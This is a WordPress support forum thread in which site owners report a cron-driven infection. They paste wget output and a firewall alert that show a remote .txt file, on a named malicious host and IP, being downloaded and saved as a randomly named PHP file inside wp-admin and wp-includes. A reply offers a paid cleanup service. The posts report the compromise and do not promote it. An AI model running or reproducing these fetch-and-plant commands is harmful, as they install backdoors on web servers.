Cron Daemon Emails

  • Starting from the beginning of the year, my account has been receiving emails below. To date, I’ve received over 43,000 of them – Can anybody help me identify the problem and provide some suggestions on how to stop these? Any ideas would be appreciated.
    ——-

    –2014-04-11 18:59:01– https://www.hestonsflorist.com/PDF/rbkvgqdyle.txt
    Resolving https://www.hestonsflorist.com… 94.242.252.130
    Connecting to https://www.hestonsflorist.com|94.242.252.130|:80… connected.
    HTTP request sent, awaiting response… 200 OK
    Length: 2772 (2.7K) [text/plain]
    Saving to: “/home/transcr1/public_html/akrontranscription.com/wp-admin/css/colors/light/odurIzCSJXCX.php”

    0K .. 100% 274M=0s

    2014-04-11 18:59:03 (274 MB/s) – “/home/transcr1/public_html/akrontranscription.com/wp-admin/css/colors/light/odurIzCSJXCX.php” saved [2772/2772]

    chmod: cannot access `/home/transcr1/public_html/akrontranscription.com/wp-admin/css/colors/light/.htaccess’: No such file or directory
    rm: cannot remove `/home/transcr1/public_html/akrontranscription.com/wp-admin/css/colors/light/.htaccess’: No such file or directory
    ———–

Viewing 2 replies - 1 through 2 (of 2 total)

  • Same issue here,
    our CSF Firewall advice us that a customer is doing a suspicious process
    Any idea how to solve?

    ==

    Time: Tue Sep 30 18:40:07 2014 +0200
    PID: 10422 (Parent PID:10421)
    Account: user
    Uptime: 65 seconds

    Executable:

    /usr/bin/wget

    Command Line (often faked in exploits):

    wget https://www.hestonsflorist.com/PDF/rbkvgqdyle.txt -O /home/user/public_html/wp-includes/SimplePie/XML/Declaration/UbgHxHngjSZT.php

    Network connections by the process (if any):

    tcp: x.x.x.x:34622 -> 94.242.252.130:80

    Files open by the process (if any):

    /dev/null
    (deleted)/home/user/public_html/wp-includes/SimplePie/XML/Declaration/UbgHxHngjSZT.php

    Memory maps by the process (if any):

    00400000-00453000 r-xp 00000000 fd:01 16209188 /usr/bin/wget
    00652000-00653000 r–p 00052000 fd:01 16209188 /usr/bin/wget
    00653000-00657000 rw-p 00053000 fd:01 16209188 /usr/bin/wget
    00657000-00662000 rw-p 00000000 00:00 0
    01ccc000-01ced000 rw-p 00000000 00:00 0 [heap]
    7ffcf640c000-7ffcf6411000 r-xp 00000000 fd:01 13111666 /lib64/libnss_dns-2.12.so
    7ffcf6411000-7ffcf6610000 —p 00005000 fd:01 13111666 /lib64/libnss_dns-2.12.so
    7ffcf6610000-7ffcf6611000 r–p 00004000 fd:01 13111666 /lib64/libnss_dns-2.12.so
    7ffcf6611000-7ffcf6612000 rw-p 00005000 fd:01 13111666 /lib64/libnss_dns-2.12.so
    7ffcf6612000-7ffcf661e000 r-xp 00000000 fd:01 13115344 /lib64/libnss_files-2.12.so
    7ffcf661e000-7ffcf681e000 —p 0000c000 fd:01 13115344 /lib64/libnss_files-2.12.so
    7ffcf681e000-7ffcf681f000 r–p 0000c000 fd:01 13115344 /lib64/libnss_files-2.12.so
    7ffcf681f000-7ffcf6820000 rw-p 0000d000 fd:01 13115344 /lib64/libnss_files-2.12.so
    7ffcf6820000-7ffcf683d000 r-xp 00000000 fd:01 13179517 /lib64/libselinux.so.1
    7ffcf683d000-7ffcf6a3c000 —p 0001d000 fd:01 13179517 /lib64/libselinux.so.1
    7ffcf6a3c000-7ffcf6a3d000 r–p 0001c000 fd:01 13179517 /lib64/libselinux.so.1
    7ffcf6a3d000-7ffcf6a3e000 rw-p 0001d000 fd:01 13179517 /lib64/libselinux.so.1
    7ffcf6a3e000-7ffcf6a3f000 rw-p 00000000 00:00 0
    7ffcf6a3f000-7ffcf6a55000 r-xp 00000000 fd:01 13115354 /lib64/libresolv-2.12.so
    7ffcf6a55000-7ffcf6c55000 —p 00016000 fd:01 13115354 /lib64/libresolv-2.12.so
    7ffcf6c55000-7ffcf6c56000 r–p 00016000 fd:01 13115354 /lib64/libresolv-2.12.so
    7ffcf6c56000-7ffcf6c57000 rw-p 00017000 fd:01 13115354 /lib64/libresolv-2.12.so
    7ffcf6c57000-7ffcf6c59000 rw-p 00000000 00:00 0
    7ffcf6c59000-7ffcf6c5b000 r-xp 00000000 fd:01 13179696 /lib64/libkeyutils.so.1.3
    7ffcf6c5b000-7ffcf6e5a000 —p 00002000 fd:01 13179696 /lib64/libkeyutils.so.1.3
    7ffcf6e5a000-7ffcf6e5b000 r–p 00001000 fd:01 13179696 /lib64/libkeyutils.so.1.3
    7ffcf6e5b000-7ffcf6e5c000 rw-p 00002000 fd:01 13179696 /lib64/libkeyutils.so.1.3
    7ffcf6e5c000-7ffcf6e66000 r-xp 00000000 fd:01 13111522 /lib64/libkrb5support.so.0.1
    7ffcf6e66000-7ffcf7065000 —p 0000a000 fd:01 13111522 /lib64/libkrb5support.so.0.1
    7ffcf7065000-7ffcf7066000 r–p 00009000 fd:01 13111522 /lib64/libkrb5support.so.0.1
    7ffcf7066000-7ffcf7067000 rw-p 0000a000 fd:01 13111522 /lib64/libkrb5support.so.0.1
    7ffcf7067000-7ffcf707e000 r-xp 00000000 fd:01 13111683 /lib64/libpthread-2.12.so
    7ffcf707e000-7ffcf727e000 —p 00017000 fd:01 13111683 /lib64/libpthread-2.12.so
    7ffcf727e000-7ffcf727f000 r–p 00017000 fd:01 13111683 /lib64/libpthread-2.12.so
    7ffcf727f000-7ffcf7280000 rw-p 00018000 fd:01 13111683 /lib64/libpthread-2.12.so
    7ffcf7280000-7ffcf7284000 rw-p 00000000 00:00 0
    7ffcf7284000-7ffcf7299000 r-xp 00000000 fd:01 13179702 /lib64/libz.so.1.2.3
    7ffcf7299000-7ffcf7498000 —p 00015000 fd:01 13179702 /lib64/libz.so.1.2.3
    7ffcf7498000-7ffcf7499000 r–p 00014000 fd:01 13179702 /lib64/libz.so.1.2.3
    7ffcf7499000-7ffcf749a000 rw-p 00015000 fd:01 13179702 /lib64/libz.so.1.2.3
    7ffcf749a000-7ffcf74c3000 r-xp 00000000 fd:01 13111518 /lib64/libk5crypto.so.3.1
    7ffcf74c3000-7ffcf76c3000 —p 00029000 fd:01 13111518 /lib64/libk5crypto.so.3.1
    7ffcf76c3000-7ffcf76c4000 r–p 00029000 fd:01 13111518 /lib64/libk5crypto.so.3.1
    7ffcf76c4000-7ffcf76c5000 rw-p 0002a000 fd:01 13111518 /lib64/libk5crypto.so.3.1
    7ffcf76c5000-7ffcf76c6000 rw-p 00000000 00:00 0
    7ffcf76c6000-7ffcf76c9000 r-xp 00000000 fd:01 13112111 /lib64/libcom_err.so.2.1
    7ffcf76c9000-7ffcf78c8000 —p 00003000 fd:01 13112111 /lib64/libcom_err.so.2.1
    7ffcf78c8000-7ffcf78c9000 r–p 00002000 fd:01 13112111 /lib64/libcom_err.so.2.1
    7ffcf78c9000-7ffcf78ca000 rw-p 00003000 fd:01 13112111 /lib64/libcom_err.so.2.1
    7ffcf78ca000-7ffcf79a5000 r-xp 00000000 fd:01 13111520 /lib64/libkrb5.so.3.3
    7ffcf79a5000-7ffcf7ba4000 —p 000db000 fd:01 13111520 /lib64/libkrb5.so.3.3
    7ffcf7ba4000-7ffcf7bae000 r–p 000da000 fd:01 13111520 /lib64/libkrb5.so.3.3
    7ffcf7bae000-7ffcf7bb0000 rw-p 000e4000 fd:01 13111520 /lib64/libkrb5.so.3.3
    7ffcf7bb0000-7ffcf7bf1000 r-xp 00000000 fd:01 13111474 /lib64/libgssapi_krb5.so.2.2
    7ffcf7bf1000-7ffcf7df1000 —p 00041000 fd:01 13111474 /lib64/libgssapi_krb5.so.2.2
    7ffcf7df1000-7ffcf7df2000 r–p 00041000 fd:01 13111474 /lib64/libgssapi_krb5.so.2.2
    7ffcf7df2000-7ffcf7df4000 rw-p 00042000 fd:01 13111474 /lib64/libgssapi_krb5.so.2.2
    7ffcf7df4000-7ffcf7f7e000 r-xp 00000000 fd:01 13111531 /lib64/libc-2.12.so
    7ffcf7f7e000-7ffcf817e000 —p 0018a000 fd:01 13111531 /lib64/libc-2.12.so
    7ffcf817e000-7ffcf8182000 r–p 0018a000 fd:01 13111531 /lib64/libc-2.12.so
    7ffcf8182000-7ffcf8183000 rw-p 0018e000 fd:01 13111531 /lib64/libc-2.12.so
    7ffcf8183000-7ffcf8188000 rw-p 00000000 00:00 0
    7ffcf8188000-7ffcf818f000 r-xp 00000000 fd:01 13115356 /lib64/librt-2.12.so
    7ffcf818f000-7ffcf838e000 —p 00007000 fd:01 13115356 /lib64/librt-2.12.so
    7ffcf838e000-7ffcf838f000 r–p 00006000 fd:01 13115356 /lib64/librt-2.12.so
    7ffcf838f000-7ffcf8390000 rw-p 00007000 fd:01 13115356 /lib64/librt-2.12.so
    7ffcf8390000-7ffcf8392000 r-xp 00000000 fd:01 13115332 /lib64/libdl-2.12.so
    7ffcf8392000-7ffcf8592000 —p 00002000 fd:01 13115332 /lib64/libdl-2.12.so
    7ffcf8592000-7ffcf8593000 r–p 00002000 fd:01 13115332 /lib64/libdl-2.12.so
    7ffcf8593000-7ffcf8594000 rw-p 00003000 fd:01 13115332 /lib64/libdl-2.12.so
    7ffcf8594000-7ffcf8749000 r-xp 00000000 fd:01 14441880 /usr/lib64/libcrypto.so.1.0.1e
    7ffcf8749000-7ffcf8949000 —p 001b5000 fd:01 14441880 /usr/lib64/libcrypto.so.1.0.1e
    7ffcf8949000-7ffcf8964000 r–p 001b5000 fd:01 14441880 /usr/lib64/libcrypto.so.1.0.1e
    7ffcf8964000-7ffcf8970000 rw-p 001d0000 fd:01 14441880 /usr/lib64/libcrypto.so.1.0.1e
    7ffcf8970000-7ffcf8974000 rw-p 00000000 00:00 0
    7ffcf8974000-7ffcf89d5000 r-xp 00000000 fd:01 14493152 /usr/lib64/libssl.so.1.0.1e
    7ffcf89d5000-7ffcf8bd5000 —p 00061000 fd:01 14493152 /usr/lib64/libssl.so.1.0.1e
    7ffcf8bd5000-7ffcf8bd9000 r–p 00061000 fd:01 14493152 /usr/lib64/libssl.so.1.0.1e
    7ffcf8bd9000-7ffcf8be0000 rw-p 00065000 fd:01 14493152 /usr/lib64/libssl.so.1.0.1e
    7ffcf8be0000-7ffcf8c00000 r-xp 00000000 fd:01 13115248 /lib64/ld-2.12.so
    7ffcf8de6000-7ffcf8dee000 rw-p 00000000 00:00 0
    7ffcf8dfe000-7ffcf8dff000 rw-p 00000000 00:00 0
    7ffcf8dff000-7ffcf8e00000 r–p 0001f000 fd:01 13115248 /lib64/ld-2.12.so
    7ffcf8e00000-7ffcf8e01000 rw-p 00020000 fd:01 13115248 /lib64/ld-2.12.so
    7ffcf8e01000-7ffcf8e02000 rw-p 00000000 00:00 0
    7fffd189c000-7fffd18b1000 rw-p 00000000 00:00 0 [stack]
    7fffd19fe000-7fffd1a00000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

    We have found the method to solve and clean the affected website. We need find hacked files to remove it and clean the crontab. Contact us to clean and fix your website/server: soporte [a] ginernet [dot] com

    The cost of this task is 30€.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Cron Daemon Emails’ is closed to new replies.